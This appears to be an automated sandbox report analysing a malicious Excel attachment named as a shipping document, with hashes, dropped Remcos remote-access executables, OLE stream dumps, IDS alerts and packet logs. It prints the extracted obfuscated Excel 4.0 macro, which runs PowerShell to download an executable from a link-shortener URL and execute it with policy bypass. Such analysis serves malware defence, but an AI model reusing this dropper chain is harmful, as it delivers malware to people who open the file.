                                                                      SHA-256:1138DFBAF272481A8F9514D857975B2B3BF02524FDE0CCA3AD713ECE89B2F06E
                                                                      SHA-512:4632E444FEB775C9DD800C729FC1A55C608D8891B64C4DCC9B1D44BA355924049E56950AB82ED0115B448372C1BA0D7CBDF1636725622ACBC17E37BD8C6F8BA1
                                                                      Malicious:false
                                                                      Preview: ..[2021/01/06 07:46:48 Offline Keylogger Started]....[ Run ]....[ Program Manager ]..
                                                                      C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Process:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):691200
                                                                      Entropy (8bit):7.036651361847925
                                                                      Encrypted:false
                                                                      SSDEEP:12288:EJZatLTZCZdmblvGcBElNOoSvhkvFqNmeeK:EJZATZsmbxGEaooIqF9ee
                                                                      MD5:35D3F86C5715649C8A4273E6A52B0B54
                                                                      SHA1:CEBDA0A60751E95D44BF19522C0F315595C47F51
                                                                      SHA-256:AEB1AAB3BE5B90CB85BFE28F0E092C83FEE4A742A9CDA7B0D8A6E464E6FA7342
                                                                      SHA-512:B3CEC30F5F79DE0A31943160687C92D5304F837A8C1DE852B5F08682DB1C8DE1A4F44C13A92C6A37CC34BD842C2D7EBF219501CE52BCA0C6A785A93D7DD5A9F4
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.._.................6...T.......U... ........@.. ....................................@.................................dU..W....`...R........................................................................... ............... ..H............text....5... ...6.................. ..`.rsrc....R...`...R...8..............@..@.reloc..............................@..B.................U......H............^...............t...........................................0............(....(..........(.....o.....*.....................(.......(.......(.......(.......(.....*.N..(....o....(.....*&..(.....*...s.........s.........s.........s.........s.........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.................,.........o....+....9....~.........,2~.........(....o .....,.
                                                                      C:\Users\user\AppData\Roaming\kXLgfvFKbJs.exe
                                                                      Process:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):691200
                                                                      Entropy (8bit):7.036651361847925
                                                                      Encrypted:false
                                                                      SSDEEP:12288:EJZatLTZCZdmblvGcBElNOoSvhkvFqNmeeK:EJZATZsmbxGEaooIqF9ee
                                                                      MD5:35D3F86C5715649C8A4273E6A52B0B54
                                                                      SHA1:CEBDA0A60751E95D44BF19522C0F315595C47F51
                                                                      SHA-256:AEB1AAB3BE5B90CB85BFE28F0E092C83FEE4A742A9CDA7B0D8A6E464E6FA7342
                                                                      SHA-512:B3CEC30F5F79DE0A31943160687C92D5304F837A8C1DE852B5F08682DB1C8DE1A4F44C13A92C6A37CC34BD842C2D7EBF219501CE52BCA0C6A785A93D7DD5A9F4
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.._.................6...T.......U... ........@.. ....................................@.................................dU..W....`...R........................................................................... ............... ..H............text....5... ...6.................. ..`.rsrc....R...`...R...8..............@..@.reloc..............................@..B.................U......H............^...............t...........................................0............(....(..........(.....o.....*.....................(.......(.......(.......(.......(.....*.N..(....o....(.....*&..(.....*...s.........s.........s.........s.........s.........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.................,.........o....+....9....~.........,2~.........(....o .....,.
                                                                      C:\Users\user\Desktop\0DFE0000
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                      Category:dropped
                                                                      Size (bytes):410341
                                                                      Entropy (8bit):7.846523872773611
                                                                      Encrypted:false
                                                                      SSDEEP:12288:2pOM3Kf8loRzQOctTs39yeNv1i8M9PeaX:2gMeFRzQwJNv69PeaX
                                                                      MD5:CF69ABF05C024CE43BAC4550B0B22C48
                                                                      SHA1:585DFE665025C8FA05952E7486FD7A87DFB926CB
                                                                      SHA-256:FA8FB3A504D56D78093F397181A3AA521A054B6A23A7AAC984B8C4272B5F0EA2
                                                                      SHA-512:7B9ABD6B418790EDE6BFEAD361F76DA432882532E399C44F73CF548BB53B0E4D37BF1E5032F9BFC6A54B37DC56C35887F8E1703415DD30DDA5BAC8DA5D658D24
                                                                      Malicious:false
                                                                      Preview: ........g2..........................\.p....user B.....a.........=..............ThisWorkbook....................................=........K^)8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1. .................C.o.n.s.o.l.a.s.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......?...........C.a
                                                                      C:\Users\user\Documents\sm.exe
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):691200
                                                                      Entropy (8bit):7.036651361847925
                                                                      Encrypted:false
                                                                      SSDEEP:12288:EJZatLTZCZdmblvGcBElNOoSvhkvFqNmeeK:EJZATZsmbxGEaooIqF9ee
                                                                      MD5:35D3F86C5715649C8A4273E6A52B0B54
                                                                      SHA1:CEBDA0A60751E95D44BF19522C0F315595C47F51
                                                                      SHA-256:AEB1AAB3BE5B90CB85BFE28F0E092C83FEE4A742A9CDA7B0D8A6E464E6FA7342
                                                                      SHA-512:B3CEC30F5F79DE0A31943160687C92D5304F837A8C1DE852B5F08682DB1C8DE1A4F44C13A92C6A37CC34BD842C2D7EBF219501CE52BCA0C6A785A93D7DD5A9F4
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.._.................6...T.......U... ........@.. ....................................@.................................dU..W....`...R........................................................................... ............... ..H............text....5... ...6.................. ..`.rsrc....R...`...R...8..............@..@.reloc..............................@..B.................U......H............^...............t...........................................0............(....(..........(.....o.....*.....................(.......(.......(.......(.......(.....*.N..(....o....(.....*&..(.....*...s.........s.........s.........s.........s.........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.................,.........o....+....9....~.........,2~.........(....o .....,.

                                                                      Static File Info

                                                                      General

                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Last Saved By: Dell, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Wed Jan 6 00:01:29 2021, Security: 0
                                                                      Entropy (8bit):7.821971165060265
                                                                      TrID:
                                                                      • Microsoft Excel sheet (30009/1) 47.99%
                                                                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                      File name:Shipping Document PLBL003534.xls
                                                                      File size:401920
                                                                      MD5:c32cd36c4ac0d06d321422080da164c8
                                                                      SHA1:ded311853adf3cfc018be4f310bbfba6fcbd0357
                                                                      SHA256:74cdd5e924e15e451b3201884c8e647061d5d1e3a7e6cb88fccbb7f26878f1e2
                                                                      SHA512:693107c19ce26917cf58e967cc9493a2d6acadc4e1ebd525842ddc1514089ad40b149e7c606b5ea3ac276282c5e76f100d29035b27317dd765bfce5c5b3a5643
                                                                      SSDEEP:12288:m5OMHq/8No5zoOcVLEP9ietHli0M9fGaa:mwM215zowhtHy9fGaa
                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                      File Icon

                                                                      Icon Hash:e4eea286a4b4bcb4

                                                                      Static OLE Info

                                                                      General

                                                                      Document Type:OLE
                                                                      Number of OLE Files:1

                                                                      OLE File "Shipping Document PLBL003534.xls"

                                                                      Indicators

                                                                      Has Summary Info:True
                                                                      Application Name:unknown
                                                                      Encrypted Document:False
                                                                      Contains Word Document Stream:False
                                                                      Contains Workbook/Book Stream:True
                                                                      Contains PowerPoint Document Stream:False
                                                                      Contains Visio Document Stream:False
                                                                      Contains ObjectPool Stream:
                                                                      Flash Objects Count:
                                                                      Contains VBA Macros:True

                                                                      Summary

                                                                      Code Page:1252
                                                                      Last Saved By:Dell
                                                                      Create Time:2020-09-20 21:17:44
                                                                      Last Saved Time:2021-01-06 00:01:29
                                                                      Security:0

                                                                      Document Summary

                                                                      Document Code Page:1252
                                                                      Thumbnail Scaling Desired:False
                                                                      Contains Dirty Links:False
                                                                      Shared Document:False
                                                                      Changed Hyperlinks:False
                                                                      Application Version:983040

                                                                      Streams

                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                      General
                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                      File Type:data
                                                                      Stream Size:4096
                                                                      Entropy:0.232115956307
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 8b 00 00 00 02 00 00 00 e4 04 00 00
                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                      General
                                                                      Stream Path:\x5SummaryInformation
                                                                      File Type:data
                                                                      Stream Size:4096
                                                                      Entropy:0.19331934541
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . h . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . . . . . . . . . . . . . D e l l . . . . @ . . . . L . z . . . . @ . . . . . R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 68 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 48 00 00 00 0d 00 00 00 54 00 00 00 13 00 00 00 60 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00 44 65 6c 6c 00 00 00 00 40 00 00 00 00 4c f7 7a
                                                                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 388805
                                                                      General
                                                                      Stream Path:Workbook
                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                      Stream Size:388805
                                                                      Entropy:7.91814259565
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . a n d r e B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p ^ ) 8 . . . . . . . X . @ . .
                                                                      Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 61 6e 64 72 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                      Macro 4.0 Code

                                                                      =ERROR(FALSE),,,,,,,,,"=GET.CELL(5,M583)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Do""&CHAR(119)&""n'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/mjfU5y0','sm""&CHAR(46)&""exe')"")",,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item """"sm""&CHAR(46)&""exe"""" -Destination """"${enV`:temp}"""""")",,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm""&CHAR(46)&""exe')"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      01/06/21-07:46:27.805527TCP2021697ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious4916980192.168.2.2283.172.144.37

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 6, 2021 07:46:26.001188993 CET49167443192.168.2.22104.22.1.232
                                                                      Jan 6, 2021 07:46:26.041352034 CET44349167104.22.1.232192.168.2.22
                                                                      Jan 6, 2021 07:46:26.041457891 CET49167443192.168.2.22104.22.1.232
                                                                      Jan 6, 2021 07:46:26.052558899 CET49167443192.168.2.22104.22.1.232
                                                                      Jan 6, 2021 07:46:26.092797995 CET44349167104.22.1.232192.168.2.22
                                                                      Jan 6, 2021 07:46:26.096955061 CET44349167104.22.1.232192.168.2.22
                                                                      Jan 6, 2021 07:46:26.096993923 CET44349167104.22.1.232192.168.2.22
                                                                      Jan 6, 2021 07:46:26.097018003 CET44349167104.22.1.232192.168.2.22
                                                                      Jan 6, 2021 07:46:26.097111940 CET49167443192.168.2.22104.22.1.232
                                                                      Jan 6, 2021 07:46:26.112956047 CET49167443192.168.2.22104.22.1.232
                                                                      Jan 6, 2021 07:46:26.153182030 CET44349167104.22.1.232192.168.2.22
                                                                      Jan 6, 2021 07:46:26.153650045 CET44349167104.22.1.232192.168.2.22
                                                                      Jan 6, 2021 07:46:26.363727093 CET49167443192.168.2.22104.22.1.232
                                                                      Jan 6, 2021 07:46:26.402647018 CET44349167104.22.1.232192.168.2.22
                                                                      Jan 6, 2021 07:46:26.402787924 CET49167443192.168.2.22104.22.1.232
                                                                      Jan 6, 2021 07:46:27.512855053 CET49167443192.168.2.22104.22.1.232
                                                                      Jan 6, 2021 07:46:27.553283930 CET44349167104.22.1.232192.168.2.22
                                                                      Jan 6, 2021 07:46:27.665705919 CET44349167104.22.1.232192.168.2.22
                                                                      Jan 6, 2021 07:46:27.665755033 CET44349167104.22.1.232192.168.2.22
                                                                      Jan 6, 2021 07:46:27.665946960 CET49167443192.168.2.22104.22.1.232
                                                                      Jan 6, 2021 07:46:27.754056931 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.805169106 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.805320024 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.805526972 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.856436014 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.857237101 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.857284069 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.857311010 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.857347012 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.857403040 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.857434988 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.857462883 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.857479095 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.857494116 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.857532978 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.857558012 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.857563972 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.857604980 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.908587933 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908617973 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908646107 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908663988 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908690929 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908710003 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908742905 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908766985 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908796072 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908808947 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908807039 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.908830881 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908850908 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908863068 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.908879995 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908900023 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908902884 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.908909082 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.908935070 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908957005 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.908972979 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.909019947 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.960577965 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960599899 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960622072 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960637093 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960659027 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960680008 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.960680962 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960706949 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960724115 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960732937 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.960747004 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960755110 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.960763931 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960787058 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960803032 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960802078 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.960824966 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960846901 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960860014 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.960871935 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960887909 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960905075 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960920095 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960944891 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.960947990 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960963964 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.960967064 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.960990906 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.961005926 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.961028099 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.961042881 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.961050987 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.961065054 CET804916983.172.144.37192.168.2.22
